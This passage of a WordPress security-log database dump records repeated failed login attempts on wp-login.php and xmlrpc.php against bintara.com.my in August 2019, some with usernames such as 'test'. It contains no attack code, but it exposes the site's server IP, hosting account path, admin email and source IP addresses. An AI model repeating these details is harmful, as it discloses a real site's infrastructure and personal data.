empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.17.213\";s:11:\"REMOTE_PORT\";s:5:\"56776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPXT3xaD7qVX4VJuZ8ADAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566824272.1005\";s:12:\"REQUEST_TIME\";s:10:\"1566824272\";}}','notice','2019-08-26 12:57:53','2019-08-26 12:57:52',17682528,19173928,'https://bintara.com.my/wp-login.php',1,0,'134.209.17.213'),(23138,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.217.169.141\";s:11:\"REMOTE_PORT\";s:5:\"40138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPbyDzAXRCh@i15RK0@pQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566825416.8564\";s:12:\"REQUEST_TIME\";s:10:\"1566825416\";}}','notice','2019-08-26 13:16:58','2019-08-26 13:16:57',17684880,19174784,'https://bintara.com.my/wp-login.php',1,0,'178.217.169.141'),(23139,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.217.169.141\";s:11:\"REMOTE_PORT\";s:5:\"40626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPbzLLuw7edOKpgf7CGTAAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566825420.6473\";s:12:\"REQUEST_TIME\";s:10:\"1566825420\";}}','notice','2019-08-26 13:17:01','2019-08-26 13:17:00',18202032,19501712,'https://bintara.com.my/xmlrpc.php',1,0,'178.217.169.141'),(23140,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.111.52.54\";s:11:\"REMOTE_PORT\";s:5:\"42438\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPeKHxaD7qVX4VJuZ8BKgAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566826024.4763\";s:12:\"REQUEST_TIME\";s:10:\"1566826024\";}}','notice','2019-08-26 13:27:05','2019-08-26 13:27:04',17682648,19175088,'https://bintara.com.my/wp-login.php',1,0,'103.111.52.54'),(23141,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.238.39\";s:11:\"REMOTE_PORT\";s:5:\"59384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPgWElLQKVpx7Mms7vLYAAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566826584.4573\";s:12:\"REQUEST_TIME\";s:10:\"1566826584\";}}','notice','2019-08-26 13:36:25','2019-08-26 13:36:24',17683328,19174416,'https://bintara.com.my/wp-login.php',1,0,'139.59.238.39'),(23142,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.238.39\";s:11:\"REMOTE_PORT\";s:5:\"59762\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPgWsc7g4l7i3TBndWpsgAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566826586.5145\";s:12:\"REQUEST_TIME\";s:10:\"1566826586\";}}','notice','2019-08-26 13:36:27','2019-08-26 13:36:26',18200120,19500728,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.238.39'),(23143,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"41.222.227.98\";s:11:\"REMOTE_PORT\";s:5:\"40208\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPixMc7g4l7i3TBndWqzwAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566827204.907\";s:12:\"REQUEST_TIME\";s:10:\"1566827204\";}}','notice','2019-08-26 13:46:46','2019-08-26 13:46:45',17683992,19174144,'https://bintara.com.my/wp-login.php',1,0,'41.222.227.98'),(23144,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"41.222.227.98\";s:11:\"REMOTE_PORT\";s:5:\"40962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPiyHxaD7qVX4VJuZ8CagAAABM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566827208.5156\";s:12:\"REQUEST_TIME\";s:10:\"1566827208\";}}','notice','2019-08-26 13:46:49','2019-08-26 13:46:48',18199968,19499400,'https://bintara.com.my/xmlrpc.php',1,0,'41.222.227.98'),(23145,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.118.66\";s:11:\"REMOTE_PORT\";s:5:\"34160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPufsc7g4l7i3TBndWw3gAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566830206.405\";s:12:\"REQUEST_TIME\";s:10:\"1566830206\";}}','notice','2019-08-26 14:36:47','2019-08-26 14:36:46',17682640,19173128,'https://bintara.com.my/wp-login.php',1,0,'166.62.118.66'),(23146,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 